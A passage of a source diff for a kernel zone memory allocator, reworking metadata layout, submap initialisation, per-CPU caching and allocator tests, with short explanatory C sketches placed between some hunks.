+                   (void *)mr.min_address, (void *)mr.max_address,
+                   (size_t)zone_range_size(&mr) >> 10);
+               printf("zone_init: metabits  %p:%p (%zuK)\n",
+                   (void *)br.min_address, (void *)br.max_address,
+                   (size_t)zone_range_size(&br) >> 10);
+#endif /* DEBUG || DEVELOPMENT */
+       } else {
+               vm_size_t size, alloc_size = meta_size;
+               vm_offset_t base;
+               bool bits_in_middle = true;
 
-       if (host == HOST_NULL) {
-               return KERN_INVALID_HOST;
-       }
+               if (hend - hstart - 2 * ZONE_GUARD_SIZE < bits_size) {
+                       alloc_size += bits_size;
+                       bits_in_middle = false;
+               }
 
-       if (recsp == NULL || recsCntp == NULL) {
-               return KERN_INVALID_ARGUMENT;
-       }
+               mr = zone_init_allocate_va(0, alloc_size, ZIA_RANDOM);
+
+               base = mr.min_address;
+               size = ZONE_GUARD_SIZE + hstart + ZONE_GUARD_SIZE;
+               if (bits_in_middle) {
+                       size += bits_size;
+                       br.min_address = base + ZONE_GUARD_SIZE + hstart;
+                       br.max_address = br.min_address + bits_size;
+               }
+               zone_init_allocate_va(base, size, ZIA_PERMANENT | ZIA_REPLACE);
 
-       zone_ptr = ZONE_NULL;
-       zone_index_foreach(i) {
-               zone_t z = &zone_array[i];
+               base += size;
+               size = mr.min_address + hend - base;
+               kmem_free(kernel_map, base, size);
 
-               /*
-                * Append kalloc heap name to zone name (if zone is used by kalloc)
-                */
-               char temp_zone_name[MAX_ZONE_NAME] = "";
-               snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s",
-                   zone_heap_name(z), z->z_name);
+               base = mr.min_address + hend;
+               size = mr.max_address - base;
+               zone_init_allocate_va(base, size, ZIA_PERMANENT | ZIA_REPLACE);
 
-               /* Find the requested zone by name */
-               if (track_this_zone(temp_zone_name, name.mzn_name)) {
-                       zone_ptr = z;
-                       break;
+               mr.min_address += ZONE_GUARD_SIZE;
+               mr.max_address -= ZONE_GUARD_SIZE;
+               if (!bits_in_middle) {
+                       br.max_address  = mr.max_address;
+                       mr.max_address -= bits_size;
+                       br.min_address  = mr.max_address;
                }
+
+#if DEBUG || DEVELOPMENT
+               printf("zone_init: metadata0 %p:%p (%zuK)\n",
+                   (void *)mr.min_address, (void *)(mr.min_address + hstart),
+                   (size_t)hstart >> 10);
+               printf("zone_init: metadata1 %p:%p (%zuK)\n",
+                   (void *)(mr.min_address + hend), (void *)mr.max_address,
+                   (size_t)(zone_range_size(&mr) - hend) >> 10);
+               printf("zone_init: metabits  %p:%p (%zuK)\n",
+                   (void *)br.min_address, (void *)br.max_address,
+                   (size_t)zone_range_size(&br) >> 10);
+#endif /* DEBUG || DEVELOPMENT */
        }
 
-       /* No zones found with the requested zone name */
-       if (zone_ptr == ZONE_NULL) {
-               return KERN_INVALID_ARGUMENT;
+       br.min_address = (br.min_address + ZBA_CHUNK_SIZE - 1) & -ZBA_CHUNK_SIZE;
+       br.max_address = br.max_address & -ZBA_CHUNK_SIZE;
+
+       zone_info.zi_meta_range = mr;
+       zone_info.zi_bits_range = br;
+
+       /*
+        * Migrate the original static metadata into its new location.
+        */
+       zone_info.zi_meta_base = (struct zone_page_metadata *)mr.min_address -
+           zone_pva_from_addr(r0.min_address).packed_address;
+       foreign_base = zone_info.zi_map_range[ZONE_ADDR_FOREIGN].min_address;
+       zone_meta_populate(foreign_base, zone_foreign_size());
+       memcpy(zone_meta_from_addr(foreign_base),
+           zone_foreign_meta_array_startup,
+           atop(zone_foreign_size()) * sizeof(struct zone_page_metadata));
+
+       zba_populate(0);
+       memcpy(zba_base_header(), zba_chunk_startup,
+           sizeof(zba_chunk_startup));
+}
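The hstart/hend computation above sizes the two metadata stretches at one struct zone_page_metadata per page of the ranges they describe, and the 256K threshold decides whether the gap between them is worth punching out. A freestanding sketch of that arithmetic, with made-up page, metadata and range sizes (all ex_* names and constants are hypothetical, not taken from the kernel):

#include <stdio.h>
#include <stdint.h>

/* Illustrative stand-ins only; the kernel derives these from the boot-time ranges. */
#define EX_PAGE_SIZE  16384ull                 /* assumed 16K pages */
#define EX_META_SIZE  32ull                    /* assumed sizeof(struct zone_page_metadata) */

static uint64_t ex_round_page(uint64_t x) { return (x + EX_PAGE_SIZE - 1) & ~(EX_PAGE_SIZE - 1); }
static uint64_t ex_trunc_page(uint64_t x) { return x & ~(EX_PAGE_SIZE - 1); }

int main(void)
{
        uint64_t r0_size   = 8ull << 30;       /* pretend r0 spans 8 GB */
        uint64_t r1_offset = 120ull << 30;     /* pretend r1 starts 120 GB above r0 */

        /* hstart: end of the metadata describing r0; hend: start of r1's metadata. */
        uint64_t hstart = ex_round_page(r0_size / EX_PAGE_SIZE * EX_META_SIZE);
        uint64_t hend   = ex_trunc_page(r1_offset / EX_PAGE_SIZE * EX_META_SIZE);

        /* Holes under 256K are kept in place; larger ones get punched out. */
        int punch = hstart < hend && hend - hstart >= (256ull << 10);
        printf("hstart=%lluK hend=%lluK punch=%d\n",
            (unsigned long long)(hstart >> 10), (unsigned long long)(hend >> 10), punch);
        return 0;
}

With these illustrative numbers the hole is roughly 224 MB, well past the 256K threshold, so the punched-out layout with guard pages would apply.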
+
+/*
+ * Global initialization of Zone Allocator.
+ * Runs after zone_bootstrap.
+ */
+__startup_func
+static void
+zone_init(void)
+{
+       vm_size_t       zone_map_size;
+       vm_size_t       remaining_size;
+       vm_offset_t     submap_min = 0;
+       uint64_t        denom = 0;
+       uint64_t        submap_ratios[Z_SUBMAP_IDX_COUNT] = {
+#ifdef __LP64__
+               [Z_SUBMAP_IDX_VA_RESTRICTED] = 20,
+#else
+               [Z_SUBMAP_IDX_VA_RESERVE]    = 10,
+#endif /* defined(__LP64__) */
+               [Z_SUBMAP_IDX_GENERAL]       = 40,
+               [Z_SUBMAP_IDX_BAG_OF_BYTES]  = 40,
+       };
+
+       if (ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) {
+               zone_last_submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES;
+       } else {
+               zone_last_submap_idx = Z_SUBMAP_IDX_GENERAL;
        }
+       zone_phys_mapped_max_pages = (uint32_t)atop(zone_phys_size_max());
 
-       /* Logging not turned on for the requested zone */
-       if (!DO_LOGGING(zone_ptr)) {
-               return KERN_FAILURE;
+       for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) {
+#if DEBUG || DEVELOPMENT
+               char submap_name[1 + sizeof("submap")];
+               snprintf(submap_name, sizeof(submap_name), "submap%d", idx);
+               PE_parse_boot_argn(submap_name, &submap_ratios[idx], sizeof(uint64_t));
+#endif
+               denom += submap_ratios[idx];
        }
 
-       /* Allocate memory for btlog records */
-       numrecs = (unsigned int)(get_btlog_records_count(zone_ptr->zlog_btlog));
-       recs_size = round_page(numrecs * sizeof *recs);
+#if __LP64__
+       zone_map_size = ZONE_MAP_VIRTUAL_SIZE_LP64;
+#else
+       zone_map_size = ptoa(zone_phys_mapped_max_pages *
+           (denom + submap_ratios[Z_SUBMAP_IDX_VA_RESERVE]) / denom);
+#endif
 
-       kr = kmem_alloc_pageable(ipc_kernel_map, &recs_addr, recs_size, VM_KERN_MEMORY_IPC);
-       if (kr != KERN_SUCCESS) {
-               return kr;
-       }
+       remaining_size = zone_map_size -
+           ZONE_GUARD_SIZE * (zone_last_submap_idx + 1);
 
        /*
-        * We will call get_btlog_records() below which populates this region while holding a spinlock
-        * (the btlog lock). So these pages need to be wired.
+        * And now allocate the various pieces of VA and submaps.
+        *
+        * Make a first allocation of contiguous VA, which we'll deallocate,
+        * and then carve memory out of that range again linearly.
+        * The kernel is still single threaded at this stage.
         */
-       kr = vm_map_wire_kernel(ipc_kernel_map, recs_addr, recs_addr + recs_size,
-           VM_PROT_READ | VM_PROT_WRITE, VM_KERN_MEMORY_IPC, FALSE);
-       assert(kr == KERN_SUCCESS);
-
-       recs = (zone_btrecord_t *)recs_addr;
-       get_btlog_records(zone_ptr->zlog_btlog, recs, &numrecs);
-
-       kr = vm_map_unwire(ipc_kernel_map, recs_addr, recs_addr + recs_size, FALSE);
-       assert(kr == KERN_SUCCESS);
 
-       *recsp = (zone_btrecord_t *) create_vm_map_copy(recs_addr, recs_size, numrecs * sizeof *recs);
-       *recsCntp = numrecs;
+       struct zone_map_range *map_range =
+           &zone_info.zi_map_range[ZONE_ADDR_NATIVE];
 
-       return KERN_SUCCESS;
+       *map_range = zone_init_allocate_va(0, zone_map_size, ZIA_NONE);
+       submap_min = map_range->min_address;
 
-#else /* DEBUG || DEVELOPMENT */
-#pragma unused(host, name, recsp, recsCntp)
-       return KERN_FAILURE;
-#endif /* DEBUG || DEVELOPMENT */
-}
+       /*
+        * Allocate the submaps
+        */
+       for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) {
+               zone_submap_init(&submap_min, idx, submap_ratios[idx],
+                   &denom, &remaining_size, ZONE_GUARD_SIZE);
+       }
 
+       assert(submap_min == map_range->max_address);
 
-#if DEBUG || DEVELOPMENT
+       zone_metadata_init();
 
-kern_return_t
-mach_memory_info_check(void)
-{
-       mach_memory_info_t * memory_info;
-       mach_memory_info_t * info;
-       unsigned int         num_info;
-       vm_offset_t          memory_info_addr;
-       kern_return_t        kr;
-       size_t               memory_info_size, memory_info_vmsize;
-       uint64_t             top_wired, zonestotal, total;
+#if VM_MAX_TAG_ZONES
+       if (zone_tagging_on) {
+               zone_tagging_init(zone_map_size);
+       }
+#endif
+#if CONFIG_GZALLOC
+       gzalloc_init(zone_map_size);
+#endif
 
-       num_info = vm_page_diagnose_estimate();
-       memory_info_size = num_info * sizeof(*memory_info);
-       memory_info_vmsize = round_page(memory_info_size);
-       kr = kmem_alloc(kernel_map, &memory_info_addr, memory_info_vmsize, VM_KERN_MEMORY_DIAG);
-       assert(kr == KERN_SUCCESS);
+       zone_create_flags_t kma_flags = ZC_NOCACHING |
+           ZC_NOGC | ZC_NOENCRYPT | ZC_NOGZALLOC | ZC_NOCALLOUT |
+           ZC_KASAN_NOQUARANTINE | ZC_KASAN_NOREDZONE;
 
-       memory_info = (mach_memory_info_t *) memory_info_addr;
-       vm_page_diagnose(memory_info, num_info, 0);
+       (void)zone_create_ext("vm.permanent", 1, kma_flags,
+           ZONE_ID_PERMANENT, ^(zone_t z){
+               z->z_permanent = true;
+               z->z_elem_size = 1;
+#if defined(__LP64__)
+               z->z_submap_idx = Z_SUBMAP_IDX_VA_RESTRICTED;
+#endif
+       });
+       (void)zone_create_ext("vm.permanent.percpu", 1, kma_flags | ZC_PERCPU,
+           ZONE_ID_PERCPU_PERMANENT, ^(zone_t z){
+               z->z_permanent = true;
+               z->z_elem_size = 1;
+#if defined(__LP64__)
+               z->z_submap_idx = Z_SUBMAP_IDX_VA_RESTRICTED;
+#endif
+       });
 
-       top_wired = total = zonestotal = 0;
+       /*
+        * Now migrate the startup statistics into their final storage.
+        */
+       int cpu = cpu_number();
        zone_index_foreach(idx) {
-               zonestotal += zone_size_wired(&zone_array[idx]);
-       }
+               zone_t tz = &zone_array[idx];
 
-       for (uint32_t idx = 0; idx < num_info; idx++) {
-               info = &memory_info[idx];
-               if (!info->size) {
-                       continue;
-               }
-               if (VM_KERN_COUNT_WIRED == info->site) {
-                       top_wired = info->size;
-               }
-               if (VM_KERN_SITE_HIDE & info->flags) {
-                       continue;
-               }
-               if (!(VM_KERN_SITE_WIRED & info->flags)) {
-                       continue;
+               if (tz->z_stats == __zpcpu_mangle_for_boot(&zone_stats_startup[idx])) {
+                       zone_stats_t zs = zalloc_percpu_permanent_type(struct zone_stats);
+
+                       *zpercpu_get_cpu(zs, cpu) = *zpercpu_get_cpu(tz->z_stats, cpu);
+                       tz->z_stats = zs;
+#if ZONE_ENABLE_LOGGING
+                       if (tz->zone_logging && !tz->zlog_btlog) {
+                               zone_enable_logging(tz);
+                       }
+#endif /* ZONE_ENABLE_LOGGING */
                }
-               total += info->size;
        }
-       total += zonestotal;
 
-       printf("vm_page_diagnose_check %qd of %qd, zones %qd, short 0x%qx\n",
-           total, top_wired, zonestotal, top_wired - total);
-
-       kmem_free(kernel_map, memory_info_addr, memory_info_vmsize);
+#if CONFIG_ZLEAKS
+       /*
+        * Initialize the zone leak monitor
+        */
+       zleak_init(zone_map_size);
+#endif /* CONFIG_ZLEAKS */
 
-       return kr;
+#if VM_MAX_TAG_ZONES
+       if (zone_tagging_on) {
+               vm_allocation_zones_init();
+       }
+#endif
 }
+STARTUP(ZALLOC, STARTUP_RANK_FIRST, zone_init);
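zone_submap_init() receives each ratio together with the remaining denominator and remaining size by reference, which suggests every submap simply takes its proportional share of whatever VA is left. A minimal user-space sketch of that style of carve-out, assuming the LP64 default 20/40/40 split over a hypothetical 512 MB budget (guard pages and the actual vm_map plumbing are omitted; this is an illustration, not the kernel routine):

#include <stdio.h>
#include <stdint.h>

int main(void)
{
        /* Hypothetical 20/40/40 split of a 512 MB map, mirroring the LP64 defaults. */
        uint64_t ratios[3]  = { 20, 40, 40 };
        uint64_t denom      = 20 + 40 + 40;
        uint64_t remaining  = 512ull << 20;

        for (int idx = 0; idx < 3; idx++) {
                /* Each submap takes its share of what is left. */
                uint64_t size = remaining * ratios[idx] / denom;
                printf("submap%d: %llu MB\n", idx, (unsigned long long)(size >> 20));
                remaining -= size;
                denom     -= ratios[idx];
        }
        return 0;
}

Consuming each ratio against the shrinking remainder means integer rounding can never over-commit the parent range, and the last submap absorbs whatever is left.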
 
-extern boolean_t(*volatile consider_buffer_cache_collect)(int);
+__startup_func
+static void
+zone_cache_bootstrap(void)
+{
+       zone_t magzone;
 
-#endif /* DEBUG || DEVELOPMENT */
+       magzone = zone_create("zcc_magazine_zone", sizeof(struct zone_magazine) +
+           zc_mag_size() * sizeof(zone_element_t),
+           ZC_NOGZALLOC | ZC_KASAN_NOREDZONE | ZC_KASAN_NOQUARANTINE |
+           ZC_SEQUESTER | ZC_CACHING | ZC_ZFREE_CLEARMEM);
+       magzone->z_elems_rsv = (uint16_t)(2 * zpercpu_count());
 
-kern_return_t
-mach_zone_force_gc(
-       host_t host)
-{
-       if (host == HOST_NULL) {
-               return KERN_INVALID_HOST;
-       }
+       os_atomic_store(&zc_magazine_zone, magzone, compiler_acq_rel);
 
-#if DEBUG || DEVELOPMENT
-       /* Callout to buffer cache GC to drop elements in the apfs zones */
-       if (consider_buffer_cache_collect != NULL) {
-               (void)(*consider_buffer_cache_collect)(0);
+       /*
+        * Now that we are initialized, we can enable zone caching for zones that
+        * were made before zone_cache_bootstrap() was called.
+        *
+        * The system is still single threaded so we don't need to take the lock.
+        */
+       zone_index_foreach(i) {
+               zone_t z = &zone_array[i];
+               if (z->z_pcpu_cache) {
+                       z->z_pcpu_cache = NULL;
+                       zone_enable_caching(z);
+               }
        }
-       consider_zone_gc(FALSE);
-#endif /* DEBUG || DEVELOPMENT */
-       return KERN_SUCCESS;
 }
+STARTUP(ZALLOC, STARTUP_RANK_FOURTH, zone_cache_bootstrap);
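The magazine zone's element size above is a header plus zc_mag_size() trailing slots, the usual flexible-array sizing pattern (the deleted zcc_magazine further down used the same shape). A small stand-alone sketch of that pattern, with hypothetical ex_* types standing in for the kernel structures:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

/* Hypothetical stand-in for a magazine: a fixed header followed by N element slots. */
struct ex_magazine {
        uint32_t  index;
        uint32_t  capacity;
        uintptr_t elements[];          /* flexible array member */
};

int main(void)
{
        unsigned count = 8;
        /* Element size = header + per-slot storage, like the zone_create() call above. */
        size_t elem_size = sizeof(struct ex_magazine) + count * sizeof(uintptr_t);

        struct ex_magazine *mag = calloc(1, elem_size);
        if (mag == NULL) {
                return 1;
        }
        mag->capacity = count;
        printf("magazine element size: %zu bytes for %u slots\n", elem_size, mag->capacity);
        free(mag);
        return 0;
}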
 
-zone_t
-zone_find_largest(void)
+void
+zalloc_first_proc_made(void)
 {
-       uint32_t    largest_idx  = 0;
-       vm_offset_t largest_size = zone_size_wired(&zone_array[0]);
+       zone_caching_disabled = 0;
+}
 
-       zone_index_foreach(i) {
-               vm_offset_t size = zone_size_wired(&zone_array[i]);
-               if (size > largest_size) {
-                       largest_idx = i;
-                       largest_size = size;
-               }
+__startup_func
+vm_offset_t
+zone_foreign_mem_init(vm_size_t size)
+{
+       vm_offset_t mem;
+
+       if (atop(size) > ZONE_FOREIGN_META_INLINE_COUNT) {
+               panic("ZONE_FOREIGN_META_INLINE_COUNT has become too small: "
+                   "%d > %d", (int)atop(size), ZONE_FOREIGN_META_INLINE_COUNT);
        }
 
-       return &zone_array[largest_idx];
+       mem = (vm_offset_t)pmap_steal_memory(size);
+
+       zone_info.zi_meta_base = zone_foreign_meta_array_startup -
+           zone_pva_from_addr(mem).packed_address;
+       zone_info.zi_map_range[ZONE_ADDR_FOREIGN].min_address = mem;
+       zone_info.zi_map_range[ZONE_ADDR_FOREIGN].max_address = mem + size;
+
+       zone_info.zi_bits_range = (struct zone_map_range){
+               .min_address = (vm_offset_t)zba_chunk_startup,
+               .max_address = (vm_offset_t)zba_chunk_startup +
+           sizeof(zba_chunk_startup),
+       };
+       zba_init_chunk(0);
+
+       return mem;
 }
 
+#endif /* !ZALLOC_TEST */
 #pragma mark - tests
 #if DEBUG || DEVELOPMENT
 
@@ -6150,37 +8577,42 @@ zone_find_largest(void)
  * a second zinit() comes through before zdestroy()),  which could lead us to
  * run out of zones.
  */
-SIMPLE_LOCK_DECLARE(zone_test_lock, 0);
+static SIMPLE_LOCK_DECLARE(zone_test_lock, 0);
 static boolean_t zone_test_running = FALSE;
 static zone_t test_zone_ptr = NULL;
 
 static uintptr_t *
-zone_copy_allocations(zone_t z, uintptr_t *elems, bitmap_t *bits,
-    zone_pva_t page_index, zone_addr_kind_t kind)
+zone_copy_allocations(zone_t z, uintptr_t *elems, zone_pva_t page_index)
 {
-       vm_offset_t free, first, end, page;
+       vm_offset_t elem_size = zone_elem_size(z);
+       vm_offset_t base;
        struct zone_page_metadata *meta;
 
        while (!zone_pva_is_null(page_index)) {
-               page  = zone_pva_to_addr(page_index);
-               meta  = zone_pva_to_meta(page_index, kind);
-               end   = page + ptoa(meta->zm_percpu ? 1 : meta->zm_page_count);
-               first = page + ZONE_PAGE_FIRST_OFFSET(kind);
+               base  = zone_pva_to_addr(page_index);
+               meta  = zone_pva_to_meta(page_index);
 
-               bitmap_clear(bits, (uint32_t)((end - first) / zone_elem_size(z)));
+               if (meta->zm_inline_bitmap) {
+                       for (size_t i = 0; i < meta->zm_chunk_len; i++) {
+                               uint32_t map = meta[i].zm_bitmap;
 
-               // construct bitmap of all freed elements
-               free = zone_page_meta_get_freelist(z, meta, page);
-               while (free) {
-                       bitmap_set(bits, (uint32_t)((free - first) / zone_elem_size(z)));
-
-                       // next free element
-                       free = *(vm_offset_t *)free ^ zp_nopoison_cookie;
-               }
-
-               for (unsigned i = 0; first < end; i++, first += zone_elem_size(z)) {
-                       if (!bitmap_test(bits, i)) {
-                               *elems++ = INSTANCE_PUT(first);
+                               for (; map; map &= map - 1) {
+                                       *elems++ = INSTANCE_PUT(base +
+                                           elem_size * __builtin_clz(map));
+                               }
+                               base += elem_size * 32;
+                       }
+               } else {
+                       uint32_t order = zba_bits_ref_order(meta->zm_bitmap);
+                       bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap);
+                       for (size_t i = 0; i < (1u << order); i++) {
+                               uint64_t map = bits[i];
+
+                               for (; map; map &= map - 1) {
+                                       *elems++ = INSTANCE_PUT(base +
+                                           elem_size * __builtin_clzll(map));
+                               }
+                               base += elem_size * 64;
                        }
                }
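Both branches of the new bitmap walk lean on the map &= map - 1 idiom, which clears the lowest set bit on every pass so the inner loop runs exactly once per set bit. A tiny freestanding illustration of that idiom (hypothetical user-space code; it reports bit indices with __builtin_ctz, whereas the kernel code above derives element offsets with __builtin_clz/__builtin_clzll):

#include <stdio.h>
#include <stdint.h>

int main(void)
{
        uint32_t map = 0x8a;    /* bits 1, 3 and 7 set */

        /* One iteration per set bit: map &= map - 1 clears the lowest one each time. */
        for (; map; map &= map - 1) {
                printf("lowest set bit at index %d\n", __builtin_ctz(map));
        }
        return 0;
}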
 
@@ -6200,13 +8632,12 @@ zone_leaks(const char * zoneName, uint32_t nameLen, leak_site_proc proc, void *
        uint32_t      idx, count, found;
        uint32_t      btidx, btcount, nobtcount, btfound;
        uint32_t      elemSize;
-       uint64_t      maxElems;
+       size_t        maxElems;
        kern_return_t kr;
-       bitmap_t     *bits;
 
-       zone_index_foreach(i) {
-               if (!strncmp(zoneName, zone_array[i].z_name, nameLen)) {
-                       zone = &zone_array[i];
+       zone_foreach(z) {
+               if (!strncmp(zoneName, z->z_name, nameLen)) {
+                       zone = z;
                        break;
                }
        }
@@ -6214,40 +8645,30 @@ zone_leaks(const char * zoneName, uint32_t nameLen, leak_site_proc proc, void *
                return KERN_INVALID_NAME;
        }
 
-       elemSize = zone_elem_size(zone);
-       maxElems = (zone->countavail + 1) & ~1ul;
+       elemSize = (uint32_t)zone_elem_size(zone);
+       maxElems = (zone->z_elems_avail + 1) & ~1ul;
 
-       if ((ptoa(zone->percpu ? 1 : zone->alloc_pages) % elemSize) &&
+       if ((ptoa(zone->z_percpu ? 1 : zone->z_chunk_pages) % elemSize) &&
            !zone_leaks_scan_enable) {
                return KERN_INVALID_CAPABILITY;
        }
 
        kr = kmem_alloc_kobject(kernel_map, (vm_offset_t *) &array,
-           maxElems * sizeof(uintptr_t) + BITMAP_LEN(ZONE_CHUNK_MAXELEMENTS),
-           VM_KERN_MEMORY_DIAG);
+           maxElems * sizeof(uintptr_t), VM_KERN_MEMORY_DIAG);
        if (KERN_SUCCESS != kr) {
                return kr;
        }
 
-       /* maxElems is a 2-multiple so we're always aligned */
-       bits = CAST_DOWN_EXPLICIT(bitmap_t *, array + maxElems);
-
-       lock_zone(zone);
+       zone_lock(zone);
 
        next = array;
-       next = zone_copy_allocations(zone, next, bits,
-           zone->pages_any_free_foreign, ZONE_ADDR_FOREIGN);
-       next = zone_copy_allocations(zone, next, bits,
-           zone->pages_all_used_foreign, ZONE_ADDR_FOREIGN);
-       next = zone_copy_allocations(zone, next, bits,
-           zone->pages_intermediate, ZONE_ADDR_NATIVE);
-       next = zone_copy_allocations(zone, next, bits,
-           zone->pages_all_used, ZONE_ADDR_NATIVE);
+       next = zone_copy_allocations(zone, next, zone->z_pageq_partial);
+       next = zone_copy_allocations(zone, next, zone->z_pageq_full);
        count = (uint32_t)(next - array);
 
-       unlock_zone(zone);
+       zone_unlock(zone);
 
-       zone_leaks_scan(array, count, zone_elem_size(zone), &found);
+       zone_leaks_scan(array, count, (uint32_t)zone_elem_size(zone), &found);
        assert(found <= count);
 
        for (idx = 0; idx < count; idx++) {
@@ -6310,6 +8731,8 @@ run_zone_test(void)
        unsigned int i = 0, max_iter = 5;
        void * test_ptr;
        zone_t test_zone;
+       zone_t test_pcpu_zone;
+       kern_return_t kr;
 
        simple_lock(&zone_test_lock, &zone_locks_grp);
        if (!zone_test_running) {
@@ -6332,9 +8755,9 @@ run_zone_test(void)
                }
 
 #if KASAN_ZALLOC
-               if (test_zone_ptr == NULL && test_zone->countfree != 0) {
+               if (test_zone_ptr == NULL && test_zone->z_elems_free != 0) {
 #else
-               if (test_zone->countfree != 0) {
+               if (test_zone->z_elems_free != 0) {
 #endif
                        printf("run_zone_test: free count is not zero\n");
                        return FALSE;
@@ -6367,15 +8790,16 @@ run_zone_test(void)
                int idx, num_allocs = 8;
                vm_size_t elem_size = 2 * PAGE_SIZE / num_allocs;
                void *allocs[num_allocs];
-               vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_count, relaxed);
-               vm_size_t zone_map_size = zone_range_size(&zone_info.zi_map_range);
+               void **allocs_pcpu;
+               vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed);
 
                test_zone = zone_create("test_zone_sysctl", elem_size,
                    ZC_DESTRUCTIBLE | ZC_SEQUESTER);
-               if (test_zone == NULL) {
-                       printf("run_zone_test: zinit() failed\n");
-                       return FALSE;
-               }
+               assert(test_zone);
+
+               test_pcpu_zone = zone_create("test_zone_sysctl.pcpu", sizeof(uint64_t),
+                   ZC_DESTRUCTIBLE | ZC_SEQUESTER | ZC_PERCPU);
+               assert(test_pcpu_zone);
 
                for (idx = 0; idx < num_allocs; idx++) {
                        allocs[idx] = zalloc(test_zone);
@@ -6385,63 +8809,105 @@ run_zone_test(void)
                for (idx = 0; idx < num_allocs; idx++) {
                        zfree(test_zone, allocs[idx]);
                }
-               assert(!zone_pva_is_null(test_zone->pages_all_free));
+               assert(!zone_pva_is_null(test_zone->z_pageq_empty));
+
+               kr = kernel_memory_allocate(kernel_map,
+                   (vm_address_t *)&allocs_pcpu, PAGE_SIZE,
+                   0, KMA_ZERO | KMA_KOBJECT, VM_KERN_MEMORY_DIAG);
+               assert(kr == KERN_SUCCESS);
+
+               for (idx = 0; idx < PAGE_SIZE / sizeof(uint64_t); idx++) {
+                       allocs_pcpu[idx] = zalloc_percpu(test_pcpu_zone,
+                           Z_WAITOK | Z_ZERO);
+                       assert(NULL != allocs_pcpu[idx]);
+               }
+               for (idx = 0; idx < PAGE_SIZE / sizeof(uint64_t); idx++) {
+                       zfree_percpu(test_pcpu_zone, allocs_pcpu[idx]);
+               }
+               assert(!zone_pva_is_null(test_pcpu_zone->z_pageq_empty));
 
-               printf("vm_page_wire_count %d, vm_page_free_count %d, p to v %qd%%\n",
+               printf("vm_page_wire_count %d, vm_page_free_count %d, p to v %ld%%\n",
                    vm_page_wire_count, vm_page_free_count,
-                   (100ULL * ptoa_64(phys_pages)) / zone_map_size);
-               zone_gc(FALSE);
-               printf("vm_page_wire_count %d, vm_page_free_count %d, p to v %qd%%\n",
+                   100L * phys_pages / zone_phys_mapped_max_pages);
+               zone_gc(ZONE_GC_DRAIN);
+               printf("vm_page_wire_count %d, vm_page_free_count %d, p to v %ld%%\n",
                    vm_page_wire_count, vm_page_free_count,
-                   (100ULL * ptoa_64(phys_pages)) / zone_map_size);
+                   100L * phys_pages / zone_phys_mapped_max_pages);
+
                unsigned int allva = 0;
-               zone_index_foreach(zidx) {
-                       zone_t z = &zone_array[zidx];
-                       lock_zone(z);
-                       allva += z->page_count;
-                       if (!z->sequester_page_count) {
-                               unlock_zone(z);
+
+               zone_foreach(z) {
+                       zone_lock(z);
+                       allva += z->z_wired_cur;
+                       if (zone_pva_is_null(z->z_pageq_va)) {
+                               zone_unlock(z);
                                continue;
                        }
                        unsigned count = 0;
                        uint64_t size;
-                       zone_pva_t pg = z->pages_sequester;
+                       zone_pva_t pg = z->z_pageq_va;
                        struct zone_page_metadata *page_meta;
                        while (pg.packed_address) {
-                               page_meta = zone_pva_to_meta(pg, ZONE_ADDR_NATIVE);
-                               count += z->alloc_pages;
+                               page_meta = zone_pva_to_meta(pg);
+                               count += z->z_percpu ? 1 : z->z_chunk_pages;
+                               if (page_meta->zm_chunk_len == ZM_SECONDARY_PAGE) {
+                                       count -= page_meta->zm_page_index;
+                               }
                                pg = page_meta->zm_page_next;
                        }
-                       assert(count == z->sequester_page_count);
+                       assert(z->z_wired_cur + count == z->z_va_cur);
                        size = zone_size_wired(z);
                        if (!size) {
                                size = 1;
                        }
                        printf("%s%s: seq %d, res %d, %qd %%\n",
-                           zone_heap_name(z), z->z_name, z->sequester_page_count,
-                           z->page_count, zone_size_allocated(z) * 100ULL / size);
-                       unlock_zone(z);
+                           zone_heap_name(z), z->z_name, z->z_va_cur - z->z_wired_cur,
+                           z->z_wired_cur, zone_size_allocated(z) * 100ULL / size);
+                       zone_unlock(z);
                }
 
                printf("total va: %d\n", allva);
 
-               assert(zone_pva_is_null(test_zone->pages_all_free));
-               assert(!zone_pva_is_null(test_zone->pages_sequester));
-               assert(2 == test_zone->sequester_page_count);
+               assert(zone_pva_is_null(test_zone->z_pageq_empty));
+               assert(zone_pva_is_null(test_zone->z_pageq_partial));
+               assert(!zone_pva_is_null(test_zone->z_pageq_va));
+               assert(zone_pva_is_null(test_pcpu_zone->z_pageq_empty));
+               assert(zone_pva_is_null(test_pcpu_zone->z_pageq_partial));
+               assert(!zone_pva_is_null(test_pcpu_zone->z_pageq_va));
+
                for (idx = 0; idx < num_allocs; idx++) {
                        assert(0 == pmap_find_phys(kernel_pmap, (addr64_t)(uintptr_t) allocs[idx]));
                }
+
+               /* make sure the zone is still usable after a GC */
+
                for (idx = 0; idx < num_allocs; idx++) {
                        allocs[idx] = zalloc(test_zone);
                        assert(allocs[idx]);
                        printf("alloc[%d] %p\n", idx, allocs[idx]);
                }
-               assert(zone_pva_is_null(test_zone->pages_sequester));
-               assert(0 == test_zone->sequester_page_count);
+               assert(zone_pva_is_null(test_zone->z_pageq_va));
+               assert(test_zone->z_wired_cur == test_zone->z_va_cur);
                for (idx = 0; idx < num_allocs; idx++) {
                        zfree(test_zone, allocs[idx]);
                }
+
+               for (idx = 0; idx < PAGE_SIZE / sizeof(uint64_t); idx++) {
+                       allocs_pcpu[idx] = zalloc_percpu(test_pcpu_zone,
+                           Z_WAITOK | Z_ZERO);
+                       assert(NULL != allocs_pcpu[idx]);
+               }
+               for (idx = 0; idx < PAGE_SIZE / sizeof(uint64_t); idx++) {
+                       zfree_percpu(test_pcpu_zone, allocs_pcpu[idx]);
+               }
+
+               assert(!zone_pva_is_null(test_pcpu_zone->z_pageq_empty));
+               assert(zone_pva_is_null(test_pcpu_zone->z_pageq_va));
+
+               kmem_free(kernel_map, (vm_address_t)allocs_pcpu, PAGE_SIZE);
+
                zdestroy(test_zone);
+               zdestroy(test_pcpu_zone);
        } else {
                printf("run_zone_test: skipping sequester test (not enabled)\n");
        }
@@ -6463,7 +8929,7 @@ run_zone_test(void)
 void
 zone_gc_replenish_test(void)
 {
-       zone_gc(FALSE);
+       zone_gc(ZONE_GC_DRAIN);
 }
